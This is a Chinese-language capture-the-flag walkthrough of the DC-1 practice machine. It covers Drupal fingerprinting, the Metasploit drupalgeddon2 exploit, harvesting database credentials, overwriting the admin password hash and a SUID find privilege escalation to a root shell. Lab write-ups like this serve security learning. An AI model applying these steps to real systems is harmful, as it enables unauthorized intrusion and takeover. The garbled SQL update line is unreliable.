DC系列-——dc1靶机解析

确定IP:
首先切换网卡到nat模式,再用kali中的nmap工具扫描当前网段的主机,查看开放主机

指令:nmap -sS 网段

试一下,找dc1的ip

打开界面是这样,看到Drupal(一种CMF框架),再使用nmap扫描80端口综合信息查找版本
指令:nmap -A -p80 DC1的ip

扫描到drupal的版本是7,接下来可以用searchsploit查找对应的漏洞

发现有的有rb文件 (rb文件是导入到msfconsole工具中的漏洞模块),查看是否有关于drupal的漏洞可以使用,这里上网查了一下各位师傅们,说是用这个模块

exploit/unix/webapp/drupal_drupalgeddon2

使用模块,然后set rhosts ,直接run过去

set rhosts xxx.xxx.xxx.xxx
run

使用pty生成虚拟终端

python -c “import pty;pty.spawn(‘/bin/sh’)"

然后查看当前目录,发现flag1.txt,查看发现flag1.txt只是前戏

flag1是一个提示,说明需要查看cms的config文件,加下来就是找到config文件查看,获取下一条信息,百度找到配置文件的位置

sites/default/settings.php

路径

找到数据库密码,数据库密码应该是第二个flag,接下来就是去数据库找文件了

进入数据库,然后选择drupaldb查找发现users表,查看字段

desc users;

发现用户名和密码的字段,但是发现加密方式咱也看不懂,或许有本地加密文件,查看…

find / -name “*pass*”

果然有,文件路径 /var/www/scripts/password-hash.sh,然后查找网上的使用方法
php password-hash.sh 密码,就会出现密码(在/var/www/html目录底下执行)

找到密码之后去mysql里面更新数据表

update users set pass="$S$DGNd1zikVA6n5iFua4HyRb5240su<s="$S$DGNd1zikVA6n5iFua4HyRb5240suDkmXJIua1nvHi6EiF  <Rb5240suDkmXJIua1nvHi6EiFkCGnR7G" where name="admin  ";

改完数据库之后登录,发现flag3

flag3提示exec 和 shell,接下来就是找flag4了

find / -name "flag4*"

查看flag4,提示我们需要找到在root目录下的flag

查看当前用户有哪些权限

find / -perm -u=s 2>/dev/null或者find / -perm -4000 2>/dev/null,发现find有root权限,再联想到之前flag3的exec,就可以用find提权

find提权:
首先创建文件

touch 123->find提权 find 123-exec ‘/bin/sh’ ;

获取到root权限之后查看root目录下的flag,发现finalflag,这就是最后的flag

DC1靶机解析+思路相关推荐

  1. vulnhub-DC系列通关记DC1靶机渗透

    声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关. 目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag ...

  2. 编程笔试(解析及代码实现):字符串反转(字符串逆序输出)代码实现十多种方法对比(解析思路及其耗费时间)详细攻略

    编程笔试(解析及代码实现):字符串反转(字符串逆序输出)代码实现十多种方法对比(解析思路及其耗费时间)详细攻略 目录 字符串反转(字符串逆序输出)代码实现十多种方法对比(解析思路及其耗费时间)详细攻略 ...

  3. 基于TencentOS-tiny实现PM2.5传感器(攀藤PMSA003)数据解析思路及实现

    说明:此文章提供了一种基于TencentOS-tiny的串口数据解析思路及实现,感谢戴大神最初写的源码,这种思路同样可以实现AT框架.基于串口的GPS数据解析等等. 1. PM2.5传感器 本文使用的 ...

  4. DC系列:1 (DC-1靶机,初级渗透详细教程)

    DC-1靶机渗透 环境搭建 详情 描述 使用工具 一:信息收集 基础信息查询 0x01 查看存活主机 0x02 查看开放端口 0x03 查看端口服务 0x04 扫描网站根目录及指纹信息 0x05 访问 ...

  5. 渗透练习 DC-1靶机

    导出的pdf下载即可 复现SLR大哥的DC-1 靶机 DC-1 安装 VM打开DC-1.ova[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ql3Hejjo-16163 ...

  6. 渗透测试-靶机打靶思路与方法

    渗透测试-靶机打靶思路与方法 文章目录 渗透测试-靶机打靶思路与方法 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: 2.对目标主机开放端口及服务发起探测 3.对非web端口的服务发起迅速的 ...

  7. 拼团模式为什么会这么火?最完整的解析思路

    拼团模式为什么会这么火?最完整的解析思路 背景:2021年05月07日,腾讯[王者荣耀]拼团活动的上线,打破传统的拼团.囤货模式,将虚拟产品嵌入到拼团模式中,新的一波拼团浪潮来临? [王者荣耀]活动规 ...

  8. 记录一下 DC1靶机渗透

    一.准备 首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里). 二.namp扫描 1.首先扫描一下这个网段 很容易可以看见DC1的靶机的ip地址192.168.1.10 ...

  9. vulnhub之DC1靶机

    靶机概览 信息收集 nmap信息收集 网站信息收集 使用nikto来收集一下 渗透攻击 getshell Flag1 Flag2 进入数据库 拿下数据库的root账号 登录网站 Flag3 Flag4 ...

最新文章

  1. DTS增量/同步支持DDL迁移的说明
  2. OpenGL学习笔记(2) 画一个正方形
  3. C# Winform只能输入数字的TextBox---补充
  4. 将log4cplus.so集成到linux下报undefined reference to 错误
  5. wxpython的sizer_wxPython BoxSizer布局
  6. python爬虫本科容易找工作吗_python爬虫基础学完了,我真的能找到一份工作吗?...
  7. cydia 未能连接服务器,iOS 越狱全过程,解决cydia或sileo无法联网问题
  8. win10系统恢复win7的照片查看器
  9. Android Activity 的详细启动过程分析
  10. 基于CC2430的Zigbee开发套件【转】
  11. ASP.net的简单认识
  12. Discuz大气游戏风格模板/仿lol英雄联盟游戏DZ游戏模板GBK
  13. Failed to start LSB: Bring up/down错误解决方法
  14. 如果我们能正确测本因子
  15. 每日新闻:麦肯锡:未来10年 人工智能为全球GDP贡献1.2%增长;工信部下发第19批CDN、云服务牌照...
  16. ElasticSearch健康检查localhost:9200 not reachable
  17. 指法练习软件需求说明书
  18. CRM系统慢慢转为企业微信SCRM
  19. 回炉重造七---磁盘存储和文件系统
  20. winsty: 我的PhD总结

热门文章

  1. 信息安全保障人员CISAW认证基础级、专业级通用认证条件
  2. 触摸按键控制 LED 灯实验
  3. 数独(sudoku)游戏的程序求解
  4. 当双十一的广告强行闯入生活
  5. CVPR2022《NFormer: Robust Person Re-identification with Neighbor Transformer》
  6. django html5模板,Django模板系统(非常详细)
  7. vue 下拉刷新 组件 伸手党福利
  8. 批量修改文件名且去掉括号操作
  9. cma检测认证机构推荐 检测机构的分类
  10. C语言课程设计个人所得税计算,请个高手帮忙设计个C语言个人所得税计算的程序...